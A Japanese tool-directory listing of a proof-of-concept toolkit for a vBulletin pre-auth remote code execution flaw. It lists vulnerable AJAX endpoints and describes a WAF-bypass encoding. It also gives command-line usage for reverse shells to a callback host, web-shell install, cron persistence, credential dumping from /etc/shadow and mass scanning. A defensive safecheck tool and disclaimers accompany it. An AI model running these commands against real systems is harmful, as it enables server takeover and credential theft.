Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-61511-PoC-Exploit — CVE-2026-61511 – vBulletin 事前認証RCE(CVSS 9.8)。脆弱性 5.x/6.x(未パッチ)。Endpoint Pool、AJAX、PHPFuck WAFバイパスによるマルチエクスプロイト。フルツールキット:リバースシェル、プロキシ、永続化、ウェブシェル、データベース操作、ファイアウォール制御、ログ管理、大量スキャン。2バージョン:マルチエクスプロイト&セーフチェック。Python 3.8+ 倫理的に使用し、法的に遵守してください。🔒 | Kitploit
ツール/GitHubGitHub/tc4dy/cve-2026-61511-poc-exploit
ネットワークマッピング脆弱性分析エクスプロイトウェブアプリケーション悪用ポストエクスプロイトWAFバイパスペネトレーションテストリモートアクセスツールペイロード開発

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
データベースセキュリティ
GitHubtc4dy/cve-2026-61511-poc-exploit

CVE-2026-61511-PoC-Exploit

CVE-2026-61511 – vBulletin 事前認証RCE(CVSS 9.8)。脆弱性 5.x/6.x(未パッチ)。Endpoint Pool、AJAX、PHPFuck WAFバイパスによるマルチエクスプロイト。フルツールキット:リバースシェル、プロキシ、永続化、ウェブシェル、データベース操作、ファイアウォール制御、ログ管理、大量スキャン。2バージョン:マルチエクスプロイト&セーフチェック。Python 3.8+ 倫理的に使用し、法的に遵守してください。🔒

リポジトリを見る
4101ヶ月前未レビュー

CVEPoC

CVE-2026-61511 – vBulletin 事前認証RCEエクスプロイト&検証ツール

Python 3.8+ CVSS Author vBulletin

⚠️ 倫理的な使用のみ – 許可されたセキュリティテスト
このリポジトリは許可されたセキュリティ専門家、ブルーチーム、ペネトレーションテスターのみを対象としたツールを提供します。
許可のないコンピュータシステムへのアクセスは、CFAA(米国)、Computer Misuse Act(英国)、TCK 243/244(トルコ)、および世界各国の同様の法律に基づき違法です。


📖 脆弱性の概要

CVE‑2026‑61511 は、vBulletin の AJAX テンプレートレンダリングエンジンにおける PHP eval() インジェクションの欠陥です。
影響を受けるバージョン: 5.0.0 – 5.7.5 および 6.0.0 – 6.2.1。

仕組み

  1. 複数の攻撃エンドポイント – このバグは複数の AJAX ハンドラーに存在します:

    • /ajax/render/pagenav
    • /ajax/api/ad/replaceAdTemplate
    • /ajax/render/widget_php
    • /ajax/render/widget_tabbedcontainer_tab_panel
    • 各種 /ajax/api/content_* /getIndexableContent エンドポイント
  2. PHPFuck エンコーディング – ペイロードは PHP 演算子と数値のシーケンスに変換され、WAF フィルターを回避して任意の PHP コード実行を可能にします。

  3. 認証不要 – 攻撃者は任意の脆弱なエンドポイントに細工した POST リクエストを送信し、Web サーバーの権限でシステムコマンドを実行できます。

  4. 影響 – サーバー完全侵害、データ窃取、バックドア、横展開、永続化。バージョンをアップグレードしてください!

パッチ

  • vBulletin 6.2.2 および旧バージョン向けの Patch Level 1 でこの問題は修正されています。
  • 常に最新バージョンへアップグレードしてください。

🧰 ツール

ツール目的対象ユーザー
exploit.pyリバースシェル、永続化、ファイル操作、データベースダンプ、ファイアウォール管理、ログ管理、ポートフォワーディング、SSH キー展開、ネットワークスキャン、マススキャン(マルチスレッド)を備えた完全なツールキット。レッドチーム / 許可されたペンテスター
safecheck.py悪意のあるペイロードを実行せずに脆弱性をチェックする非侵襲的な検証ツール。バージョンを検出し、全エンドポイントをテストして詳細なレポートを生成します。ブルーチーム / セキュリティ監査人

📊 機能比較


🎯 ユースケース概要


⚙️ インストール

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-61511-PoC-Exploit
cd CVE-2026-61511-PoC-Exploit
pip install -r requirements.txt

requirements.txt の内容:

root@kitploit:~
request
urllib3

パラメータ 🌬️

シナリオ

エンドポイントプール 🅿️

🛡️ 責任ある使用

  • これらのツールは、所有しているシステム、または明示的な書面によるテスト許可を得たシステムでのみ使用してください。
  • 許可のないアクセスは違法かつ非倫理的です。
  • 著者はいかなる誤用についても責任を負いません。
  • 常に自国の法律と規制に従ってください。

このソフトウェアは教育目的および許可されたセキュリティテストのみを目的として提供されています。

ツールをダウンロード
機能exploit.pysafecheck.py
脆弱性検出✅✅
バージョン検出✅✅
マルチエンドポイントテスト(18 パス)✅✅
コマンド実行✅❌
リバースシェル✅❌
ファイルアップロード/ダウンロード✅❌
永続化メカニズム✅❌
Web シェル展開✅❌
データベース操作✅❌
システム情報収集✅✅
ファイアウォール管理✅❌
ログ管理✅❌
ポートフォワーディング✅❌
SSH キー展開✅❌
ネットワークスキャン✅❌
マススキャン(マルチスレッド)✅❌
プロキシサポート✅✅
JSON レポート出力✅✅
対話型メニュー✅❌
非侵襲(セーフ)モード❌✅
詳細/デバッグモード✅✅
カスタムコマンド実行✅❌
マルチコマンドチェーン✅❌
リモートファイル読み取り✅❌
リモートファイル書き込み✅❌
システムユーザー管理✅❌
ファイアウォール回避テクニック✅❌
WAF 回避(PHPFuck)✅✅
シナリオ推奨ツール
ブルーチーム – vBulletin インストールが脆弱かどうかの確認safecheck.py
セキュリティ監査 – 非侵襲的な脆弱性評価safecheck.py
レッドチーム – 完全なエクスプロイトを伴う許可されたペネトレーションテストexploit.py
バグバウンティ – 責任ある開示テストsafecheck.py
マススキャン – 複数のターゲットの脆弱性チェックexploit.py(検出のみ)
インシデントレスポンス – システムが侵害されているかの確認safecheck.py
パラメータ説明
-t, --targetターゲット URL(例: http://forum.com/vb)
--proxyHTTP プロキシ(例: http://127.0.0.1:8080)
--timeoutリクエストタイムアウト(秒)(デフォルト: 10)
--retryパスごとのリトライ回数(デフォルト: 3)
--output詳細レポートを JSON ファイルに保存
-v, --verbose詳細出力
-q, --quietクワイエットモード(最小出力)
--lhostエクスプロイトに必須 – コールバック用 IP
--lportコールバック用ポート(デフォルト: 4444)
--threadsマススキャン用スレッド数(デフォルト: 5)
--exploit検出後にエクスプロイトを実行
--fullフルアタック(全モジュール)
--shellリバースシェルを開始
--webshellWeb シェルをインストール(/shell.php)
--persist永続化をインストール(cron ジョブ)
--dumpデータベースをダンプ
--dump-creds認証情報をダンプ(/etc/passwd、/etc/shadow)
--interactive検証成功後の対話型メニュー
#シナリオコマンド
1クイック脆弱性チェックpython safecheck.py -t http://target.com/vb
2レポート付き詳細スキャンpython safecheck.py -t http://target.com/vb --output report.json -v
3リバースシェルpython exploit.py -t http://target.com/vb --lhost 192.168.1.100 --lport 4444 --shell
4フルアタック(全モジュール)python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --full
5ファイルからのマススキャンpython exploit.py -l targets.txt --lhost 192.168.1.100 --threads 20 --output results.json
6対話型メニューモードpython exploit.py -t http://target.com/vb --lhost 192.168.1.100 --interactive
#エンドポイント
1/ajax/render/pagenav
2/ajax/render/pagenav?template=page
3/ajax/api/ad/replaceAdTemplate
4/ajax/render/widget_php
5/ajax/render/widget_tabbedcontainer_tab_panel
6/ajax/api/content_infraction/getIndexableContent
7/ajax/api/content_video/getIndexableContent
8/ajax/api/content_text/getIndexableContent
9/ajax/api/content_report/getIndexableContent
10/ajax/api/content_redirect/getIndexableContent
11/ajax/api/content_privatemessage/getIndexableContent
12/ajax/api/content_poll/getIndexableContent
13/ajax/api/content_photo/getIndexableContent
14/ajax/api/content_link/getIndexableContent
15/ajax/api/content_gallery/getIndexableContent
16/ajax/api/content_event/getIndexableContent
17/ajax/api/content_channel/getIndexableContent
18/ajax/api/content_attach/getIndexableContent